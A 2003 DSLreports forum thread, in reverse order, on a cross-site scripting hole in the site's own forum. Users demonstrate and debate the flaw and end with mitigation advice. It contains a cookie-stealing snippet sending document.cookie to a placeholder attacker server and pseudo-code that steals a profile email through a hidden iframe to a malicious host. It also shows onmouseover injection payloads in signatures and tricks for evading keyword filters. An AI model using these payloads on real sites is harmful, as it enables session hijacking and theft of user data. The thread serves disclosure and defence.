DSLreports Clicking a link in forums? in Security

Re: DSLreports Clicking a link in forums?

Tue, 29 Jul 2003 07:50:04 EDT

jdong :

quote:

Andrew Clover
mailto:and@doxdesk.com
»www.doxdesk.com/"onmouseover="al···ello!');

;-)

LOL

»www.doxdesk.com/"onmouseover="wi···opup!');

Less harmful version, since popup blockers usually stop this one...

You guys, STOP MAKING ME HOLD DOWN CTRL! LOL
--
---This area is intentionally left blank.---

Re: DSLreports Clicking a link in forums?

Tue, 29 Jul 2003 04:19:02 EDT

bobince :

(Of course, I blame IE, netscape/mozilla know better than to execute that).

Actually the second example does work on Mozilla (1.1 at least).

Mozilla doesn't load javascript: URLs in image elements, which is indeed much more sensible than IE. But there are many other strategies for script injection.

We'll work on removing javascript altogether though.

Let me know if you need a hand, or want some testing. As a webapp author I've been collecting various script injection attacks!

--
Andrew Clover
mailto:and@doxdesk.com
»www.doxdesk.com/"onmouseover="al···ello!');

;-)

Re: DSLreports Clicking a link in forums?

Mon, 28 Jul 2003 12:29:53 EDT

Sarick : I would like to thank everyone who took part in this topic my thanks to everyone who added to the topic and helped it's success. :)

This was an educating experience I won't soon forget. :)

Re: DSLreports Clicking a link in forums?

Mon, 28 Jul 2003 12:21:36 EDT

Sarick : Ok it seems to have been confermed. :|

WTG guys.

Nil it looks like your contest to prove the vulnerabilty was a success. No grins here :|

Are there plans to make changes that block Java inside the fourm?

Re: DSLreports Clicking a link in forums?

Mon, 28 Jul 2003 10:26:10 EDT

dp :

said by nil :
Okay, you've made your point :)

(Of course, I blame IE, netscape/mozilla know better than to execute that)..

We'll work on removing javascript altogether though.

IE is the devil.
--
Write your questions down on the back of a $20 dollar bill and send them to me

Re: DSLreports Clicking a link in forums?

Mon, 28 Jul 2003 10:04:30 EDT

nil : Okay, you've made your point :)

(Of course, I blame IE, netscape/mozilla know better than to execute that)..

We'll work on removing javascript altogether though.
--
Life is too short to be boring

Re: DSLreports Clicking a link in forums?

Mon, 28 Jul 2003 01:14:59 EDT

bobince : Here's another demo for you:

»/forum/remark,···ode=flat

Are you satisfied yet?

--
Andrew Clover
mailto:and@doxdesk.com
»www.doxdesk.com/

Re: DSLreports Clicking a link in forums?

Mon, 28 Jul 2003 00:07:11 EDT

bobince : Marilla's right. Once you let untrusted JavaScript onto your site, you have lost.

If you want an exploit that actually *does* steal the e-mail address rather than just alert() it, I'd suggest making somewhere hidden to post it.

It can of course be done without creating a new window, too - that was just the quickest way I could think of to demonstrate.

--
Andrew Clover
mailto:and@doxdesk.com
»www.doxdesk.com/

Re: DSLreports Clicking a link in forums?

Sun, 27 Jul 2003 17:35:57 EDT

Marilla : Possible Mitigating Factors:

I see that the profile form has "type=hidden" set on it. To my knowledge, that's not something typicaly used on the FORM ITSELF.. usually it's used on elements that you want to store information on to be re-submitted to the website but that you don't want the user to be able to change... I'm wondering if, perhaps, putting this attribute on the FORM tag itself hides the form from, say, Javascript? I *don't* believe that to be the case, however, because I believe that form elements of type=hidden are perfectly 'seeable' by Javascript, as well... they simply don't get displayed on the page itself... I can't imagine a use for that attribute, but if it really does that, perhaps that helps.

Second, as I noted, it does not appear as though your password is sent to that web page anywhere at all, so it cannot be used to actually access your account by 'stealing' your password.

Re: DSLreports Clicking a link in forums?

Sun, 27 Jul 2003 17:26:16 EDT

Marilla : Here's the thing, nil;

Javascript has 'permission' to access all the data on the web page it loads up... Say there's Javascript on this posting page I'm looking at now.. it has 'permission' to check this posting box and, say, make sure there's content in it at all, and pop up an 'alert' if I try to submit it without content (it DOESN'T, but I'm saying, Javascript COULD do that)

Basically, Javascript on THIS PAGE has access to ALL the information on this page, including the information I type into this box.. or information that was loaded on the box to begin with... such as the box that shows your 'e-mail' when viewing your account information.

You're with me so far, yes?

Now follow me a little further here: Javascript ALSO has permission to access form data on 'frames' or other elements that IT LOADS itself, from the same domain. For example, if there was a frameset page for this.. the frameset page used Javascript to load a page in each of two frames. Assuming your Javascript knows the form names of anything on either of the two frames, it would be able to access THAT information, too - because IT forced the loading of those pages, and those pages are on the same domain. I'm actually not sure that the first requirement is neccesary, in fact... and I hope like heck that the second one is... but I DO know that Javascript is perfectly capable of accessing the FORMS data that is currently in any text box, select, checkbox, etc, that is displayed in the same browser window as it, if the 'other pages' in the browser window are from the same domain.

Now, so far, all of this is OK; there's no specific 'vulnerability' in any of this really - provided you trust a certain website... certainly you wouldn't mind a certain website knowing information that it already knows.. hehe.

However... here's the problem: Because people can type text, HTML, and therefore Javascript into this website, this website essentially has the whole public world as a potential 'Web designer'. Right now, I am authoring a page on BroadbandReports.com; Anything I type into this box right here gets displayed with the same 'permissions' as though it were the original designer of this whole website doing it.

I have to do this in 'pseudo code', because I don't recall the exact names and such to do this, but I know this is how it would be done.. ALL of this could be done in the SRC="" attribute of an Image tag, for example... meaning it could all happen automatically on opening of a post. Note that everything I'm posting here is stuff that Javascript CAN do... also remember that Javascript has ALL the 'permission' it needs to do this, because as far as the browser is concerned, the code it's reading was written by the web designer of Broadbandreports.com; the browser has NO way of knowing that the script it's encountered was written by some anonymous bloke!

First; the code would create an 'Iframe' somewhere on the page - most likely somewhere hidden, or so small that it wouldn't be seen at all.

Second; it would load the victim's broadbandreports.com account page in that iframe. Load up: http://www.broadbandreports.com/prof right now... no matter WHO you are, if you are logged in, that page will show your information. In this particular case, your e-mail address is the most 'sensitive' piece of info displayed there. Lukcily, it seems that your PASSWORD is NOT displayed on that page, even 'hidden' in the HTML (hidden in such a way would NOT be hidden at all from this exploit)

Next, that very same Javascript contained in that IMG SRC="" thing would next access the frame through the standard collections that hold every frame, iframe, etc that is contained in a window.. it could probably do it by name, because the script could have named the iframe itself when it created it.

Next, once it's using the proper object to get to that Iframe, it then would need to find either the form name, or the form index of the form that contains all that info. That form happens to be un-named, but it can be found be referring to the forms() collection of the document object... someone could "View Source" on that page just once to figure out which Index it would have. Even if it changed, code could be put in which would simply find the right one..

Because then, all once you have the document (frame) and form, you just need to know the name of the form element you want. In this case, the form element in question is named, predictably, "email".

All the above would work in one line, though.. something like:

DummyVariable = window.CreatedIFrame.Forms(1).email;

and then all we need is:

CreatedIFrame.URL = ("www.maliciouswebsite.com/capture.php?cap=" + DummyVariable);

================================================

I'm REALLY rusty on the particulars; I don't know the proper names and arguments to use here, but I KNOW these things can be done. Let me take a wild stab at this, and someone who knows better about Javascript can verify the concept anyway - my suggestion would be that at this stage, NOT to provide the exact code, however... that would be akin to handing someone the whole process - which we're nearly doing anyway.

Of course, for anyone thinking of possibly exploiting such a thing right now, I should add this information, before I continue:

1-The only 'personal' information you can really get is someone's e-mail address. Passwords are NEVER sent to the web browser in any form, and NO ONE has shown ANY method at all for COOKIES to actually be gotten at all by this method - I DO maintain that I do not believe that can be done. What I'm about to post can't remotely be used to do such a thing.

2-Un-registered users cannot put HTML in posts at all. To my knowledge, that leaves them with no way to do this. Which means...

3-People who do this will leave a 'trail' back to themselves by way of a valid e-mail address. But wait, there's more!

4-This also requires that the person in question have a web server to which to direct the traffic, and the nature of this traffic would be such that it would be easy for an ISP to verify the malicious nature of what's going on.

5-In short, it's a lot of 'trouble' to possibly get into, for information that's not particularly all that great.

==================================================

So, onto my 'bad code' to do this. Note that everything I'm about to type would ALL go within one IMG SRC=""... right between the quotes. For those not familiar, the semicolons; indicate the end of a line of code; That's one reason this can be done.

One further thing... to make things MUCH easier for me, every time you see { or } below, assume I really mean the greater than/less than signs.. if I just type them, they'll be converted to actual HTML, and you won't get to see hat I'm typing.. and I'm too lazy to actually type the > stuff! hehe

Again, also, note that I'm not familiar with the Iframe HTML or EXACTLY how Javascript handles locating and identifying frames and IFrames.. so I am almost certainly mangling the syntax here... I'm just giving a rough idea how it might be done.

document.write ('{iframe xpos=-3455 ypos=-999 width=2 height=2 URL=That-profile-page-link-I-showed name=CreatedIFrame}');DummyVar=window.CreatedIFrame.form(1).email;CreatedIFrame.URL=('www. malicioussite.com/gather.php?info=' + DummyVariable);

And that's pretty much it.

Re: DSLreports Clicking a link in forums?

Sun, 27 Jul 2003 12:53:15 EDT

nil : Actually, no, because JavaScript is client side.

Re: DSLreports Clicking a link in forums?

Sun, 27 Jul 2003 12:52:36 EDT

Sarick : If you can see it isn't it possible that the link that loads your data offloads it to the attacker?

Re: DSLreports Clicking a link in forums?

Sun, 27 Jul 2003 12:28:27 EDT

Buddel3 : You are right. If I'm the only person who can see my own email address, I don't think it's something to worry about. I wouldn't call this a security risk either.

Re: DSLreports Clicking a link in forums?

Sun, 27 Jul 2003 12:25:18 EDT

nil : That's my point.. it just show *you* what *you* have access to.. not to others what they don't. It's not a security risk at all.
--
Life is too short to be boring

Re: DSLreports Clicking a link in forums?

Sun, 27 Jul 2003 12:22:58 EDT

Buddel3 : Yes, I could see my own email address after clicking on this link. The question is whether it can be seen by other people as well.

Re: DSLreports Clicking a link in forums?

Sun, 27 Jul 2003 12:16:25 EDT

nil : hum, okay.. so what's my email address? I did click on it..

It didn't open a new window for me.. but for those that did.. did it show you *your* /prof or someone elses?

Which is my point.. yes, you can show them their own email address.. big deal.. doesn't mean you can steal it..

--
Life is too short to be boring
[text was edited by author 2003-07-27 12:18:52]

Re: DSLreports Clicking a link in forums?

Sun, 27 Jul 2003 09:20:20 EDT

bobince :

to make this more secure I can create a private forum to which only you and I can post?

That sounds like not a bad idea.

I don't think you can do this..

Here's an e-mail stealing exploit:

»/forum/remark,···#7511839

Feel free to delete once tested! :-)

--
Andrew Clover
mailto:and@doxdesk.com
»www.doxdesk.com/

Re: DSLreports Clicking a link in forums?

Sat, 26 Jul 2003 20:01:51 EDT

jdong : Hmm, the simplest way of patching this hole:

Check that all SRC and HREF start with http(s)/ftp, if they don't add them.
--
---This area is intentionally left blank.---

Re: DSLreports Clicking a link in forums?

Sat, 26 Jul 2003 16:29:29 EDT

nil : Hm, well, to make this more secure I can create a private forum to which only you and I can post? That way nobody will accidentally stumble and scream to heaven about their security being compromised..

I don't think you can do this.. but if you can, more power to you and then we'll at least know we have to patch up a serious hole.
--
Life is too short to be boring

Re: DSLreports Clicking a link in forums?

Sat, 26 Jul 2003 15:33:20 EDT

Marilla : Just one note about this, before I actually start working on it (as I posted in the comments on the news item related to this, I am terribly busy this weekend... we publish a monthly paper, and monday is when it gets printed!)...

First, you are aware that this will require that we force redirection to another website, right? I also want to make sure that NO ONE innocently clicks on the link to the thread I will start, as if this works, even clicking on that link will cause... err.. nevermnd; I think we've already shown that by putting Javascript in the IMG tag SRC attribute, it can load automatically... so now we can just put the Javascript in an A tag with copious warnings that it is a test of an exploit that steals personal information, and then the website link itself could, perhaps simply report back your own e-mail... since it will be loading at a TOTALLY DIFFERENT web domain, I think that the site simply displaying the e-mail would be sufficient? I promise that if I do this, I WON'T use any 'client side' tricks to cause the e-mail to display - the SERVER itself will put the e-mail on the page, meaning the server could just as easily have stored the information.

As I'm going through this... and I still may do it... something strikes me.

This offers no way to know someone's PASSWORD for their account, since, I'm assuming, the account page does not display the password, in text or in HTML. I'd still consider it troublesome to be able to get something like the e-mail (and assuming I get the thumb'-up on what I've noted above) I'll still do the proof of concept, if I can.. although it may be better for someone more familiar with Javascript to do it.. hehe.. I'd need to do a bit of referring to references, first!

Re: DSLreports Clicking a link in forums?

Sat, 26 Jul 2003 14:42:17 EDT

nil : Okay.. you guys say you can get my email address using JavaScript?

Have at it.. I just changed it to a random address (but a valid one).. First to find out what it is will get a cookie.

Use the »/dev/null forum for this though.
--
Life is too short to be boring

Re: DSLreports Clicking a link in forums?

Sat, 26 Jul 2003 14:26:11 EDT

Sarick :

said by ChrisXP :
This is a very informative thread.

Takes awhile to get through the roadblocks, but once it does get through progress is made. :)

Good job, Sarick, good job! And I love your quote:

"I know I'm not Stupid, A stupid person doesn't ask questions."

:)

CXP

Thank you for that comment. :)

Re: DSLreports Clicking a link in forums?

Sat, 26 Jul 2003 08:02:40 EDT

ChrisXP : This is a very informative thread.

Takes awhile to get through the roadblocks, but once it does get through progress is made. :)

Good job, Sarick, good job! And I love your quote:

"I know I'm not Stupid, A stupid person doesn't ask questions."

:)

CXP
--
"It's not what you see that's suspect, but how you interpret what you see." ~~~ Isaac Asimov
Remember 9/11: Bodies found "intact": 289
Body parts found: 19,858
Families who received no remains: 1,717

Re: DSLreports Clicking a link in forums?

Sat, 26 Jul 2003 01:44:25 EDT

Sarick : why can't all imag links be locked to image files. (alrady done)

and all web URLs be clear text so if you want to link to them you cut and past. That might help right?

At least until the security risk is fixed.

Re: DSLreports Clicking a link in forums?

Sat, 26 Jul 2003 01:31:54 EDT

bobince :

functions to replace possibly dangerous JS could 'break' JS functionality without actually harming the appearance of legitimate posts.

Ehh. I'm not sure it's worth bothering too much with this. Almost all blocks of this kind are pretty easy to get around.

Say you block the word 'cookie'; I can use document['coo'+'kie'] instead. You block 'document', I use eval('do\x63ument'). And so on. If an attacker has a Turing-compliant programming language at their fingertips, you're onto a loser. :-)

Easier is to try to prevent scripting content getting through at all. Although it's still quite difficult, as it demonstrated by the vulnerability of the vast majority of fora out there including DSLR!

The basics:

* Limit special markup to as few features as possible and make sure they must be matched exactly. If using HTML-style markup, do not allow any attributes to be submitted other than required ones, and require input in a fixed form. Ideally, avoid allowing HTML-style markup in posts at all.

* HTML-encode all text and values included in attributes (eg. URLs in images) on output. There should be no avenue for the poster to get a literal ampersand, quote or left angle bracket into a post.

* If links or images are allowed, disallow any URL method not known-good (http, https, ftp). There are more URL types that can be dangerous than just javascript:.

* Ensure the character set of the final page the untrusted input will appear in is stated, either in the HTML or HTTP headers. If the character set is UTF-8, ensure invalid character sequences cannot be output, for example by storing the posting itself as 16-bit-wide character strings.

(Apologies for the boringness of this post!)

--
Andrew Clover
mailto:and@doxdesk.com
»www.doxdesk.com/

Re: DSLreports Clicking a link in forums?

Fri, 25 Jul 2003 20:56:52 EDT

Marilla : Thank you... you answered my questions! As I noted, I use Javascript a LOT, but usually just to validate forms input - say, to pop up an 'alert' when a required field is missing, so as to avoid a trip to the server, which will only complain about the same thing... and I use it for "Go Back" links, with the history.go(-1) thing, and that's pretty much it...

So I really wasn't aware of what, if any, options there were for accessing stuff like this.... what functions and such Javascript provided which would allow for such information to be gotten... Because a forum like this essentially allows a user to 'write web pages' on the site, I see what you mean, and I very much agree that filters should be added to remove such things (one nice thing about Javascript: It's VERY picky about things like capitalization and such, so functions to replace possibly dangerous JS could 'break' JS functionality without actually harming the appearance of legitimate posts.

And now that you've pointed this out, I'll be adding some more such functions to my OWN public forum system (I programmed my own system that people pay a small fee to customize and use on their sites)... it currently filters out many client-side script things, but this discussion has made me consider a possibility that I'm not sure I covered... so I'll be looking into that to make sure my own users are not exposed to such possible exploits.

Re: DSLreports Clicking a link in forums?

Fri, 25 Jul 2003 18:35:47 EDT

bobince : Marilla wrote:

What's in question is whether, under 'good' security settings, Javascript would get "everything that DLSR itself would have access to" in the first place... how?

Because a script included in a page at example.com is allowed to make a connection to example.com under user credentials, take any action the user can take manually, and read the contents of the returned document.

So for example if I want to find out your real e-mail address, I can include a JavaScript hack in this posting that adds an invisible iframe to the page, sets its location to www.dslreports.com/prof, and accesses (iframe).document.forms[0].elements['email'].value.

Similarly I can script the elements in an iframe to make you post something, add something to your profile, or whatever. The only thing I can't do is grab your password, because the browser doesn't send your password and DSLR never returns it.

Simple question that'll answer this for me: All I ever use Javascript for is form information validation, and navigation...

Do you mean as a site user or a site author?

As a site author you don't usually have to worry about your own scripts; as long as they don't accept user input and add it to the page, they're pretty much safe. What you have to worry about, if you have a forum, is ensuring that other people can't sneak their own scripts onto your pages my means of posting hacks.

so, does Javascript actually have access to cookie values? By what mechanism?

The 'cookie' property of the 'document' object. eg. try entering javascript:alert(document.cookie) into the address bar.

There are perfectly good reasons for allowing JavaScript to read and set cookies. (For example I use it to implement a hash-based authentication mechanism for when HTTP Digest Authentication isn't available.) The problem is only when a site allows scripts on it that aren't controlled by that site.

--
Andrew Clover
mailto:and@doxdesk.com
http://www.doxdesk.com/

Re: DSLreports Clicking a link in forums?

Fri, 25 Jul 2003 01:42:49 EDT

Marilla :

said by bobince :
It's not grabbing a file as such, it's grabbing everything that DLSR itself would have access to, which includes DSLR's own cookies. Once the info is grabbed...

*SNIP*

STOP! right there! Back up... "It's grabbing everything that DLSR itself would have access to..."... That's where you lose me; I know that Javascript can easily direct the browser to ANY webpage at all, anywhere in the world, and include any information in the querystring that it is able to get... that much is not at all in question... I write web pages that use Javascript to do this almost every day..

What's in question is whether, under 'good' security settings, Javascript would get "everything that DLSR itself would have access to" in the first place... how?

Simple question that'll answer this for me: All I ever use Javascript for is form information validation, and navigation... so, does Javascript actually have access to cookie values? By what mechanism?

If so, then I understand exactly what you are saying.

Oh.. and my name is "Marilla", not "That's my Pet X" hehe
[text was edited by author 2003-07-25 01:43:12]

Re: DSLreports Clicking a link in forums?

Fri, 25 Jul 2003 01:23:40 EDT

bobince : That's My Pet X wrote:

I'm still not convinced that this amounts to a security problem here, as I do not believe that Javascript would be given access to grab a file from the system (cookies), and then pass that information on to a website.. I dunno.

It's not grabbing a file as such, it's grabbing everything that DLSR itself would have access to, which includes DSLR's own cookies. Once the info is grabbed, sending it to another server is absolutely trivial, you just do any JavaScript operation that results in an HTTP request, and append the cookie to the URL. Often this is done with something like:

im= new Image();
im.src= '»attacking.server/logcookie.cgi?'···.cookie;

but there are many other ways of doing it, which may work better in various circumstances.

lysw1 wrote:

Thank goodness for SurfinGuardPro. What's with all the ActiveX controls at www.doxdesk.com?

No ActiveX controls as such, but there is a JavaScript that probes for various ActiveX controls being installed, in order to search for spyware and various other nasties.

--
Andrew Clover
mailto:and@doxdesk.com
»www.doxdesk.com/

Re: DSLreports Clicking a link in forums?

Wed, 23 Jul 2003 09:37:55 EDT

Marilla : Umm.. something to add here:

I would be very, very careful about putting ANY website in the 'Trusted Zone'... in particular, I would never ever put a website that has forums in the 'trusted sites' zone... even my own forum site, I would never put in the Trusted Sites zone.

Re: DSLreports Clicking a link in forums?

Wed, 23 Jul 2003 09:05:09 EDT

Jason Levine :

said by Sarick :
Links however can prove to be nasty. I've tried to set IE to block active X it kills the browser!

I use MyIE2 (an IE "wrapper" program that adds tabbing, pop-up blocking, etc) and I can set it to not load ActiveX, Java, Images, etc. Of course, the better method is the one JayKayKay described of using the Trusted Zone for sizes that need ActiveX and the Internet Zone for sites that don't need it.
--
-Jason Levine
http://www.jasons-toolbox.com/
http://www.PCQandA.com/
http://www.urateit.com/

Re: DSLreports Clicking a link in forums?

Wed, 23 Jul 2003 02:48:23 EDT

Sarick :

said by bobince :

--
Andrew Clover
mailto:and@doxdesk.com
»www.doxdesk.com/

Wow my system won't load that page.

Re: DSLreports Clicking a link in forums?

Wed, 23 Jul 2003 02:43:55 EDT

Sarick : Scary stuff. Them tool points are hard to get. LOL

Actuialy I think it's a bigger security risk with the cookies now.

DSLreports has a security problem with the cookies. Yea some peoples connections would bust so best solution would be multiple configs. That way people don't have it turned on if it conflicts.

Links however can prove to be nasty. I've tried to set IE to block active X it kills the browser! Then again that might be different not that PCCillin is GONE. I found a glitch in it's active X webblocking TMproxy that has been confermed.

I noticed a file in my desktop the other day that had address book main user identity list in it file named ~
I don't use outlook and adress book so that axtive x must have let something in past spyware guard.

Microshaft Please fix your browser..

Re: DSLreports Clicking a link in forums?

Tue, 22 Jul 2003 17:22:29 EDT

Marilla :

said by Sarick :
Hay, I didn't get to see it.

What happene, It seems you've proven that there is a security risk with the links. Unless you faked that moderater edit. :)

Putting script for a Javascript 'Alert' function worked when put in a URL, and when put in the SRC of an IMG tag. When put in the IMG tag, it caused the Alert to come up immediately on loading the page.

However, I'm still not convinced that this amounts to a security problem here, as I do not believe that Javascript would be given access to grab a file from the system (cookies), and then pass that information on to a website.. I dunno.

Re: DSLreports Clicking a link in forums?

Tue, 22 Jul 2003 17:20:00 EDT

Marilla : Did he say "X Box"?

Re: DSLreports Clicking a link in forums?

Tue, 22 Jul 2003 16:46:45 EDT

jaykaykay :

said by Sarick :
All this software for security. Seems like active X should be X'ed

It is on my system. I only add something to my Trusted sites if I absolutely trust it and have to run activeX. Otherwise, it is totally x'd on my box.
--
JKK:-) Age is a very high price to pay for my maturity. If I can't stay young, I can at least stay immature!

Re: DSLreports Clicking a link in forums?

Tue, 22 Jul 2003 10:18:41 EDT

lysw1 : Yeah, except that some sites require it. (www.live365.com)

Re: DSLreports Clicking a link in forums?

Tue, 22 Jul 2003 09:45:20 EDT

Sarick :

said by lysw1 :
Thank goodness for SurfinGuardPro. What's with all the ActiveX controls at www.doxdesk.com?

All this software for security. Seems like active X should be X'ed

Re: DSLreports Clicking a link in forums?

Tue, 22 Jul 2003 08:17:19 EDT

lysw1 : Thank goodness for SurfinGuardPro. What's with all the ActiveX controls at www.doxdesk.com?

Re: DSLreports Clicking a link in forums?

Tue, 22 Jul 2003 06:06:04 EDT

Sarick :

said by bobince :
Wrong.. What I posted before is true.. having the cookie is not enough to hijack an account to even make a post..

Well, I am currently posting from a completely different browser, which I authorised by copying document.cookie from the original browser (as if hijacked from JavaScript). So I don't see any security measures that are stopping me from authorising myself as someone else.

And even if this weren't possible, an attacker could stick script an automatic make-a-post or do-an-admin-action attack, through cross-frame scripting.

--
Andrew Clover
mailto:and@doxdesk.com
»www.doxdesk.com/

I see what your saying. If your cookie is uploaded to another site then installed over on to another computer the users account is hijacked. Well that's simple enough.

Placing a JS link that uploads the file to another site even DSLreports could exploited.

The same "code" that allows us to upload our own images could be used as sorta a storage point to hijack the cookie?

Then the person wanting to hijack would simply retrieve that file and install it on their system. They technicaly take over the members account. From there they could post messages, steal non-public e-mail info, access tool points and other member data.

Yes I see what your saying now. Even if the cookie is encrypted it could be used on another computer. Purhaps limiting the encription to an IP range might make it less exploitible. That way if your IP changes to another service provider it'll requare you to relog completely.

That will disable the cookie by currupting it vs the current IP. :)

[text was edited by author 2003-07-22 06:09:41]

Re: DSLreports Clicking a link in forums?

Tue, 22 Jul 2003 05:37:57 EDT

Sarick : Hay, I didn't get to see it.

What happene, It seems you've proven that there is a security risk with the links. Unless you faked that moderater edit. :)

Re: DSLreports Clicking a link in forums?

Mon, 21 Jul 2003 16:36:50 EDT

Marilla : Alrighty:

Admin: Feel free to edit this post once the concept is proven.
[text was edited by author 2003-07-21 16:37:19]

[Edit: okay, we need to work on that i guess :) - nil ]
[text was edited by moderator]

Re: DSLreports Clicking a link in forums?

Mon, 21 Jul 2003 16:12:39 EDT

nil : I do believe it gets stripped out on posting.. it may show up in preview.. but go ahead.. give it a try..
--
Life is too short to be boring

Re: DSLreports Clicking a link in forums?

Mon, 21 Jul 2003 15:58:21 EDT

bobince :

and you didn't have to re-enter your password?

That is correct.

Plus it was from the same IP..

True, but I'd be surprised if the software requires the IP address to stay constant for one user, as that would completely break the site for eg. AOL users, whose apparent IP address can change on every request.

Even if cookie-stealing didn't give access to accounts (and it's actually very tricky to arrange something like that), just allowing JavaScript through from user-submitted content is enough to compromise the security of the board. It is this that is the real problem.

Filtering JavaScript out completely is not a trivial task, and most forum software is vulnerable to JS injection (cross-site-scripting, XSS) one way or another - search Bugtraq for a large yet incomplete list of known forum vulnerabilities. The software DSLR is using seems to fall to at least one method of JS injection (namely javascript: pseudo-URIs) that is extremely simple and well-known, though.

Or at least I assume so - such exploits make it through the preview; I haven't tried posting them to a live thread. I can try if you like, hope you don't mind the alert() boxes. ;-)

(Incidentally, javascript: URIs are one of the worst ever ideas, and have caused endless security holes in web browsers and sites alike, whilst offering zero actual new utility to web authors. Whichever clever-trousers @netscape came up with them desperately needs a kick to the face!)

--
Andrew Clover
mailto:and@doxdesk.com
»www.doxdesk.com/

Re: DSLreports Clicking a link in forums?

Sun, 20 Jul 2003 23:56:18 EDT

Sarick : My dad passed away about 20 years ago.

Re: DSLreports Clicking a link in forums?

Sun, 20 Jul 2003 23:50:08 EDT

Sarick : So In your best judgement DSLreports does have a security valneriblity.

It seems a few people who are on this thread thought that this flaw was urben legends.

Re: DSLreports Clicking a link in forums?

Sun, 20 Jul 2003 15:10:25 EDT

Phoenix22 :

said by Sarick :
Could clicking a link in DSLreports allow someone to steal your DSLreports password or cookie to get your email?

I've been told that is a security flaw by an admin of a very populer site. CjayC Gamefaqs.com

Anyone?

Wait til dad gets home...I'm tellin'.....
--
"De Oppresso Liber" (We Liberate (Free) the Oppressed) Computer Cops Security Professionals, Site Administrator

Re: DSLreports Clicking a link in forums?

Sun, 20 Jul 2003 15:04:05 EDT

nil : and you didn't have to re-enter your password? Plus it was from the same IP..
--
Life is too short to be boring

Re: DSLreports Clicking a link in forums?

Sun, 20 Jul 2003 13:48:09 EDT

bobince :

Wrong.. What I posted before is true.. having the cookie is not enough to hijack an account to even make a post..

Well, I am currently posting from a completely different browser, which I authorised by copying document.cookie from the original browser (as if hijacked from JavaScript). So I don't see any security measures that are stopping me from authorising myself as someone else.

And even if this weren't possible, an attacker could stick script an automatic make-a-post or do-an-admin-action attack, through cross-frame scripting.

--
Andrew Clover
mailto:and@doxdesk.com
»www.doxdesk.com/

Re: DSLreports Clicking a link in forums?

Sun, 20 Jul 2003 13:18:22 EDT

hpguru :

said by Reverend Ike :
Perhaps you should create a "special" Hpguru Hosts file for them.

4,294,967,295 entries ... :D

LOL! Nah I'd never get any else done. How about a Proxo filter that modifies all "A" tags such that when clicked they pop-up a little confirm box asking

"Are you sure? It could be dangerous you know."

If they click "Ok" an alert box pops up stating

"YOU HAVE BEEN WARNED!!"

If they click "Cancel" they get an alert stating

"You have made the right choice, but to be on the safe side you should still format your hard disk and reinstall Windows ASAP. Have a nice day!".
--
"My country, right or wrong," is a thing that no patriot would think of saying except in a desperate case. It is like saying, "My mother, drunk or sober." - G.K.Chesterton

Re: DSLreports Clicking a link in forums?

Sun, 20 Jul 2003 13:17:00 EDT

nil :

said by bobince :
DSLR does not actually include the passwords in the cookies, and doesn't allow the password to be changed without the old password being entered, so this wouldn't give an attacker the ability to steal accounts wholesale, but it *would* allow them to post as the victim, change the victim's details, etc. And if the victim is a site administrator everything is up for grabs.

Wrong.. What I posted before is true.. having the cookie is not enough to hijack an account to even make a post..
--
Life is too short to be boring

Re: DSLreports Clicking a link in forums?

Sun, 20 Jul 2003 13:09:23 EDT

bobince : OK, here's the deal.

JavaScript (or any other web scripting language, eg. VBSCript) is potentially dangerous. A script on a page can display your cookies, send your cookies to another server, pop up a window containing porn, make you post a message to the forums automatically... and so on.

For most sites this is not an issue because a script could only get onto the page by the site's author putting it there. Naturally DSLReports has no need to steal DSLReports's own cookies, and no inclination to harrass us with pop-ups.

However, DSLReports, by operating this forum, is allowing us to add our own content to their web pages. For this reason the material we are allowed to post in a comment is limited. I can't just include a